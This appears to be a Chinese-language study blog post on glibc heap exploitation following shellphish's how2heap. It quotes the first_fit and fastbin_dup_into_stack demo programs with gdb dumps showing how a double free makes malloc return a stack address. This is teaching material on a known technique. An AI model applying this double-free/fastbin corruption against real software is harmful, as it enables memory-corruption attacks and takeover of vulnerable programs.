<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    How2Heap堆利用学习笔记(一)：fastbin_attack |
    
    Migraine</title>
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-how2heap1" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      How2Heap堆利用学习笔记(一)：fastbin_attack
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2019/11/22/how2heap1/" class="article-date">
  <time datetime="2019-11-22T03:43:44.000Z" itemprop="datePublished">2019-11-22</time>
</a>
        
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
  </div>

      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <p>注：首发于<a href="https://www.anquanke.com/post/id/192823" target="_blank" rel="noopener">安全客</a></p>
<blockquote>
<p>概述:对Linux下堆利用的学习记录，学习顺序大体是按照shellphish团队的how2heap的流程，尽量每个方面都调试的详尽一些，并结合案例进行分析。</p>
</blockquote>
 <a id="more"></a>

<h1 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h1><p>使用的是Ubuntu16.04，自带的glibc版本如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">$ file &#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc-2.23.so </span><br><span class="line"></span><br><span class="line">&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU&#x2F;Linux), dynamically linked, interpreter &#x2F;lib64&#x2F;ld-linux-x86-64.so.2, BuildID[sha1]&#x3D;b5381a457906d279073822a5ceb24c4bfef94ddb, for GNU&#x2F;Linux 2.6.32, stripped</span><br></pre></td></tr></table></figure>

<p>官方的github</p>
<p><a href="https://github.com/shellphish/how2heap" target="_blank" rel="noopener">https://github.com/shellphish/how2heap</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git clone https:&#x2F;&#x2F;github.com&#x2F;shellphish&#x2F;how2heap.git</span><br></pre></td></tr></table></figure>
<p>某些利用技术在2.25以上的gilbc上会失效，只能在glibc_2.25以下实现的技术也已经被分类放在对应文件夹下了，所以ubuntu16.04是一个比较合适的实验环境。</p>
<p>如果系统不符合，也可以自己编译合适版本glibc然后修改系统链接库的环境变量。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ ls</span><br><span class="line"></span><br><span class="line">calc_tcache_idx    first_fit    glibc_build.sh      malloc_playground</span><br><span class="line"></span><br><span class="line">calc_tcache_idx.c  first_fit.c  glibc_ChangeLog.md  malloc_playground.c</span><br><span class="line"></span><br><span class="line">fastbin_dup        glibc_2.25   glibc_run.sh        README.md</span><br><span class="line"></span><br><span class="line">fastbin_dup.c      glibc_2.26   Makefile</span><br></pre></td></tr></table></figure>




<p>进入目录进行$make，所有源代码都被编译成功。</p>
<p>查看MakeFile，都是使用本地的glibc进行的编译。</p>
<p>还可以手动添加参数CFLAGS += -fsanitize=address用于检测内存错误，个人感觉是类似win下pageheap的机制，用于更准确定位错误内存地址。</p>
<p><strong><em>MakeFile</em></strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">BASE &#x3D; fastbin_dup malloc_playground first_fit calc_tcache_idx</span><br><span class="line"></span><br><span class="line">V2.25 &#x3D; glibc_2.25&#x2F;fastbin_dup_into_stack glibc_2.25&#x2F;fastbin_dup_consolidate glibc_2.25&#x2F;unsafe_unlink glibc_2.25&#x2F;house_of_spirit glibc_2.25&#x2F;poison_null_byte glibc_2.25&#x2F;house_of_lore glibc_2.25&#x2F;overlapping_chunks glibc_2.25&#x2F;overlapping_chunks_2 glibc_2.25&#x2F;house_of_force glibc_2.25&#x2F;large_bin_attack glibc_2.25&#x2F;unsorted_bin_attack glibc_2.25&#x2F;unsorted_bin_into_stack glibc_2.25&#x2F;house_of_einherjar glibc_2.25&#x2F;house_of_orange</span><br><span class="line"></span><br><span class="line">V2.26 &#x3D; glibc_2.26&#x2F;unsafe_unlink glibc_2.26&#x2F;house_of_lore glibc_2.26&#x2F;overlapping_chunks glibc_2.26&#x2F;large_bin_attack glibc_2.26&#x2F;unsorted_bin_attack glibc_2.26&#x2F;unsorted_bin_into_stack glibc_2.26&#x2F;house_of_einherjar glibc_2.26&#x2F;tcache_dup glibc_2.26&#x2F;tcache_poisoning glibc_2.26&#x2F;tcache_house_of_spirit</span><br><span class="line"></span><br><span class="line">PROGRAMS &#x3D; $(BASE) $(V2.25) $(V2.26)</span><br><span class="line"></span><br><span class="line">CFLAGS +&#x3D; -std&#x3D;c99 -g</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># Convenience to auto-call mcheck before the first malloc()</span><br><span class="line"></span><br><span class="line">#CFLAGS +&#x3D; -lmcheck</span><br><span class="line"></span><br><span class="line">all: $(PROGRAMS)</span><br><span class="line">clean:</span><br><span class="line">​	rm -f $(PROGRAMS)</span><br></pre></td></tr></table></figure>



<h1 id="1-first-fit"><a href="#1-first-fit" class="headerlink" title="1.first_fit"></a>1.first_fit</h1><p>漏洞类型:UAF(但无法利用)</p>
<p>第一题案例我们是无法干预程序行为但，目的是让我们熟悉堆分配机制。</p>
<p>在gdb中使用p main_arena可以看到程序中堆结构的细节。详见glibc源码。</p>
<p>案例源代码://省略了一部分无关输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;This file doesn&#39;t demonstrate an attack, but shows the nature of glibc&#39;s allocator.\n&quot;);</span><br><span class="line"></span><br><span class="line">​	char* a &#x3D; malloc(0x512);</span><br><span class="line">​	char* b &#x3D; malloc(0x256);</span><br><span class="line"></span><br><span class="line">​	char* c;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;1st malloc(0x512): %p\n&quot;, a);</span><br><span class="line">​	fprintf(stderr, &quot;2nd malloc(0x256): %p\n&quot;, b);</span><br><span class="line">​	fprintf(stderr, &quot;we could continue mallocing here...\n&quot;);</span><br><span class="line">​	fprintf(stderr, &quot;now let&#39;s put a string at a that we can read later \&quot;this is A!\&quot;\n&quot;);</span><br><span class="line">​	strcpy(a, &quot;this is A!&quot;);</span><br><span class="line">​	fprintf(stderr, &quot;first allocation %p points to %s\n&quot;, a, a);</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;Freeing the first one...\n&quot;);</span><br><span class="line">​	free(a);</span><br><span class="line">​	fprintf(stderr, &quot;So, let&#39;s allocate 0x500 bytes\n&quot;);</span><br><span class="line">​	c &#x3D; malloc(506);</span><br><span class="line">​	fprintf(stderr, &quot;3rd malloc(0x500): %p\n&quot;, c);</span><br><span class="line">​	fprintf(stderr, &quot;And put a different string here, \&quot;this is C!\&quot;\n&quot;);</span><br><span class="line">​	strcpy(c, &quot;this is C!&quot;);</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;3rd allocation %p points to %s\n&quot;, c, c);</span><br><span class="line">​	fprintf(stderr, &quot;first allocation %p points to %s\n&quot;, a, a);</span><br><span class="line">​	fprintf(stderr, &quot;If we reuse the first allocation, it now holds the data from the third allocation.\n&quot;);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap3335.png" alt=""> </p>
<h2 id="流程分析"><a href="#流程分析" class="headerlink" title="流程分析"></a>流程分析</h2><p>首先通过malloc分配两个内存，返回内存指针地址-0x10是chunk块的真正头部。</p>
<p>这两块内存相邻，header之间的距离正好是0x520字节。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;5gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000521 --&gt;chunkA header</span><br><span class="line">0x603010:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x603020:	0x0000000000000000</span><br><span class="line"></span><br><span class="line">gdb-peda$ x&#x2F;5gx 0x603530-0x10</span><br><span class="line"></span><br><span class="line">0x603520:	0x0000000000000000	0x0000000000000261 --&gt;chunkB header</span><br><span class="line">0x603530:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x603540:	0x0000000000000000</span><br><span class="line"></span><br><span class="line">执行strcpy向chunkA写入”this is A!”,从内存指针起始地址写入数据。</span><br><span class="line"></span><br><span class="line">gdb-peda$ x&#x2F;5gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000521</span><br><span class="line">0x603010:	0x2073692073696874	0x0000000000002141</span><br><span class="line">0x603020:	0x0000000000000000</span><br></pre></td></tr></table></figure>


<p>执行free释放chunkA之后，A内存没有被马上回收，而是链接到了unsorted bin中。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;5gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000521 &lt;- chunkA [freed]</span><br><span class="line">0x603010:	0x00007ffff7dd1b78	0x00007ffff7dd1b78 &lt;- fd pointer,bk pointer</span><br><span class="line">0x603020:	0x0000000000000000</span><br></pre></td></tr></table></figure>
<p>查看unsorted bin</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;5gx 0x7ffff7dd1b78</span><br><span class="line"></span><br><span class="line">0x7ffff7dd1b78 &lt;main_arena+88&gt;:	0x0000000000603780 	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b88 &lt;main_arena+104&gt;:	0x0000000000603000 	0x0000000000603000 -&gt;free chunk list</span><br><span class="line">0x7ffff7dd1b98 &lt;main_arena+120&gt;:	0x00007ffff7dd1b88</span><br></pre></td></tr></table></figure>


<p>重新malloc一块内存chunk_C,发现分配的内存块正是之前被释放的chunk_A内存。</p>
<p>虽然fd和bk指针依然存在，但是size值已经被改变了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;5gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000211</span><br><span class="line">0x603010:	0x00007ffff7dd1fa8	0x00007ffff7dd1fa8</span><br><span class="line">0x603020:	0x0000000000603000</span><br></pre></td></tr></table></figure>
<p>此时访问unsorted bin,发现此时挂载在unsorted bin是chunk_A分割出来的一部分，因为申请的C空间小于chunk_A,就从A中分配了一部分给C，剩下的部分继续挂载在bins上。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;5gx 0x7ffff7dd1b78</span><br><span class="line"></span><br><span class="line">0x7ffff7dd1b78 &lt;main_arena+88&gt;:	0x0000000000603780	 0x0000000000603210</span><br><span class="line">0x7ffff7dd1b88 &lt;main_arena+104&gt;:	0x0000000000603210 	0x0000000000603210 &lt;-unsorted bins</span><br><span class="line"></span><br><span class="line">0x7ffff7dd1b98 &lt;main_arena+120&gt;:	0x00007ffff7dd1b88</span><br><span class="line">gdb-peda$ x&#x2F;5gx 0x603210</span><br><span class="line">0x603210:	0x0000000000000000	0x0000000000000311 </span><br><span class="line">0x603220:	0x00007ffff7dd1b78	0x00007ffff7dd1b78</span><br></pre></td></tr></table></figure>


<p>执行strcpy向chunk_C写入”this is C!”，内存中也找到了对象的字符串ASCII码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;5gx 0x603010-0x10</span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000211</span><br><span class="line">0x603010:	0x2073692073696874	0x00007ffff7002143</span><br><span class="line">0x603020:	0x0000000000603000</span><br></pre></td></tr></table></figure>


<p>此时的A指针仍然是存在的，所以可能会存在UAF漏洞，这个漏洞之前在分析IE漏洞的时候也分析过，就不再赘述了。</p>
<h1 id="2-fastbin-dup-into-stack"><a href="#2-fastbin-dup-into-stack" class="headerlink" title="2.fastbin_dup_into_stack"></a>2.fastbin_dup_into_stack</h1><p>漏洞类型fastbin_attack</p>
<p>背景知识:</p>
<p>Fast bins 主要是用于提高小内存的分配效率,使用单链表进行链接，默认情况下，对于 SIZE_SZ 为 4B 的平台， 小于 64B 的 chunk 分配请求，对于 SIZE_SZ 为 8B 的平台，小于 128B 的 chunk 分配请求，首先会查找 fast bins 中是否有所需大小的 chunk 存在(精确匹配)，如果存在，就直接返回。 </p>
<p>简介:这个漏洞是我之前与堆溢出相识的第一道题，很不靠谱的以为这是UAF漏洞（当时概念不清）。Fastbin_attack主要是通过修改fd指针，伪造一个fake_chunk，实现对任意地址写。</p>
<p>源代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;This file extends on fastbin_dup.c by tricking malloc into\n&quot;</span><br><span class="line"></span><br><span class="line">​	       &quot;returning a pointer to a controlled location (in this case, the stack).\n&quot;);</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">​	unsigned long long stack_var;</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;The address we want malloc() to return is %p.\n&quot;, 8+(char *)&amp;stack_var);</span><br><span class="line">​	fprintf(stderr, &quot;Allocating 3 buffers.\n&quot;);</span><br><span class="line"></span><br><span class="line">​	int *a &#x3D; malloc(8);</span><br><span class="line">​	int *b &#x3D; malloc(8);</span><br><span class="line">​	int *c &#x3D; malloc(8);</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;1st malloc(8): %p\n&quot;, a);</span><br><span class="line">​	fprintf(stderr, &quot;2nd malloc(8): %p\n&quot;, b);</span><br><span class="line">​	fprintf(stderr, &quot;3rd malloc(8): %p\n&quot;, c);</span><br><span class="line">​	fprintf(stderr, &quot;Freeing the first one...\n&quot;);</span><br><span class="line"></span><br><span class="line">​	free(a);</span><br><span class="line">​	fprintf(stderr, &quot;If we free %p again, things will crash because %p is at the top of the free list.\n&quot;, a, a);</span><br><span class="line">​	&#x2F;&#x2F; free(a);</span><br><span class="line">​	fprintf(stderr, &quot;So, instead, we&#39;ll free %p.\n&quot;, b);</span><br><span class="line">​	free(b);</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;Now, we can free %p again, since it&#39;s not the head of the free list.\n&quot;, a);</span><br><span class="line">​	free(a);</span><br><span class="line">​	fprintf(stderr, &quot;Now the free list has [ %p, %p, %p ]. &quot;</span><br><span class="line">​		&quot;We&#39;ll now carry out our attack by modifying data at %p.\n&quot;, a, b, a, a);</span><br><span class="line">​	unsigned long long *d &#x3D; malloc(8);</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;1st malloc(8): %p\n&quot;, d);</span><br><span class="line">​	fprintf(stderr, &quot;2nd malloc(8): %p\n&quot;, malloc(8));</span><br><span class="line">​	fprintf(stderr, &quot;Now the free list has [ %p ].\n&quot;, a);</span><br><span class="line">​	fprintf(stderr, &quot;Now, we have access to %p while it remains at the head of the free list.\n&quot;</span><br><span class="line"></span><br><span class="line">​		&quot;so now we are writing a fake free size (in this case, 0x20) to the stack,\n&quot;</span><br><span class="line">​		&quot;so that malloc will think there is a free chunk there and agree to\n&quot;</span><br><span class="line">​		&quot;return a pointer to it.\n&quot;, a);</span><br><span class="line">​	stack_var &#x3D; 0x20;</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n&quot;, a);</span><br><span class="line">​	*d &#x3D; (unsigned long long) (((char*)&amp;stack_var) - sizeof(d));</span><br><span class="line"></span><br><span class="line">​	fprintf(stderr, &quot;3rd malloc(8): %p, putting the stack address on the free list\n&quot;, malloc(8));</span><br><span class="line">​	fprintf(stderr, &quot;4th malloc(8): %p\n&quot;, malloc(8));</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="流程分析-1"><a href="#流程分析-1" class="headerlink" title="流程分析"></a>流程分析</h2><p>首先分配了三个大小相同的内存空间，分配内存大小为0x20（必为8的整数倍，并且最小为32字节）折柳使用gef插件，可以比较好的调试heap</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000021 &lt;- chunk_A</span><br><span class="line"></span><br><span class="line">0x603010:	0x0000000000000000	0x0000000000000000</span><br><span class="line"></span><br><span class="line">0x603020:	0x0000000000000000	0x0000000000000021 &lt;-chunk_B</span><br><span class="line"></span><br><span class="line">0x603030:	0x0000000000000000	0x0000000000000000</span><br><span class="line"></span><br><span class="line">0x603040:	0x0000000000000000	0x0000000000000021 &lt;-chunk_C</span><br><span class="line"></span><br><span class="line">0x603050:	0x0000000000000000	0x0000000000000000</span><br><span class="line"></span><br><span class="line">0x603060:	0x0000000000000000	0x0000000000020fa1 &lt;-Top_chunk</span><br><span class="line"></span><br><span class="line">0x603070:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>


<p>第一次free内存a，查看内存本身并没有变化。因为fast bins是一个单链表，此时查看fast bins就能看到链表头。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20gx 0x603010-0x10</span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000021</span><br><span class="line">0x603010:	0x0000000000000000	0x0000000000000000</span><br><span class="line"></span><br><span class="line">gef➤  heap bin fast</span><br><span class="line"></span><br><span class="line">─────[ Fastbins for arena 0x7ffff7dd1b20 ]────</span><br><span class="line">Fastbin[0]  →   UsedChunk(addr&#x3D;0x603010,size&#x3D;0x20)  </span><br><span class="line">Fastbin[1] 0x00</span><br><span class="line">Fastbin[2] 0x00</span><br></pre></td></tr></table></figure>
<p>第二次free b内存，因为如果fast bins链表头存放的是a的地址，那就无法再次释放a了。</p>
<p>此时fashbins链表已经将b内存插入到了链表头。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000021</span><br><span class="line">0x603010:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x603020:	0x0000000000000000	0x0000000000000021</span><br><span class="line">0x603030:	0x0000000000603000	0x0000000000000000</span><br><span class="line">0x603040:	0x0000000000000000	0x0000000000000021</span><br><span class="line"></span><br><span class="line">Fastbin[0]  →   UsedChunk(addr&#x3D;0x603030,size&#x3D;0x20)   →   UsedChunk(addr&#x3D;0x603010,size&#x3D;0x20)</span><br></pre></td></tr></table></figure>


<p>再次free a内存，此时fastbin形成了一个回路。此时完成一次double free操作，之后无论如何申请空间多少次，0x603010这个地址一直都在fastbin这个表中。这样便能完成对Free_Chunk的修改（对fd指针的修改）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fastbin[0]  →   UsedChunk(addr&#x3D;0x603010,size&#x3D;0x20)   →   UsedChunk(addr&#x3D;0x603030,size&#x3D;0x20)   →UsedChunk(addr&#x3D;0x603010,size&#x3D;0x20) [无限循环略]</span><br></pre></td></tr></table></figure>


<p>此时执行到unsigned long long *d = malloc(8)</p>
<p>再次将chunk_A原所在内存分配给了d</p>
<p>接下来再分配一次</p>
<p>聪明的读者到这里应该看得出，如果再分配几十次，也只会一直分配这两个地址。目前指针d已经指向了free_chunk_A(0x189e010)所以我们也就能修改其内容。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1st malloc(8): 0x189e010</span><br><span class="line"></span><br><span class="line">2nd malloc(8): 0x189e030</span><br></pre></td></tr></table></figure>
<p>Now the free list has [ 0x189e010 ].</p>
<h2 id="利用手法"><a href="#利用手法" class="headerlink" title="利用手法"></a>利用手法</h2><p>接下里的步骤是整个攻击的关键，取stack_var-8的地址，写入d覆盖FD指针。</p>
<p>即伪造了一个fake_chunk（为绕过size检查，size的位置必须为0x20或0x21）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">stack_var &#x3D; 0x20;</span><br><span class="line">*d &#x3D; (unsigned long long) (((char*)&amp;stack_var) - sizeof(d));</span><br></pre></td></tr></table></figure>
<p>反汇编代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">0x000000000040091a &lt;+628&gt;:	lea    rax,[rbp-0x30]</span><br><span class="line">0x000000000040091e &lt;+632&gt;:	sub    rax,0x8</span><br><span class="line">0x0000000000400922 &lt;+636&gt;:	mov    rdx,rax</span><br><span class="line">0x0000000000400925 &lt;+639&gt;:	mov    rax,QWORD PTR [rbp-0x10]</span><br><span class="line">0x0000000000400929 &lt;+643&gt;:	mov    QWORD PTR [rax],rdx</span><br></pre></td></tr></table></figure>


<p>伪造了一个Free chunk，查看内存，与我们的模拟图一致。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">+----------------------+----------------------+    &lt;----- chunk_d的FD ptr</span><br><span class="line"></span><br><span class="line">|                              |                      |</span><br><span class="line"></span><br><span class="line">|     prev_size           |      size(0x20)    |</span><br><span class="line"></span><br><span class="line">|                               |                      |</span><br><span class="line"></span><br><span class="line">+----------------------+----------------------+    </span><br><span class="line"></span><br><span class="line">|                                                      |</span><br><span class="line"> </span><br><span class="line">|                   Unused                         |</span><br><span class="line"></span><br><span class="line">|                                                      |</span><br><span class="line"></span><br><span class="line">+----------------------+----------------------+</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20gx 0x603010-0x10</span><br><span class="line"></span><br><span class="line">0x603000:	0x0000000000000000	0x0000000000000021</span><br><span class="line"></span><br><span class="line">0x603010:	0x00007fffffffddc8	0x0000000000000000</span><br><span class="line"></span><br><span class="line">0x603020:	0x0000000000000000	0x0000000000000021</span><br></pre></td></tr></table></figure>


<p>到目前为止，已经完成了对fastbin_attack</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fastbin[0]  →   UsedChunk(addr&#x3D;0x603010,size&#x3D;0x20)   →   FreeChunk(addr&#x3D;0x7fffffffddd8,size&#x3D;0x20)   →   FreeChunk(addr&#x3D;0x603020,size&#x3D;0x0)</span><br></pre></td></tr></table></figure>

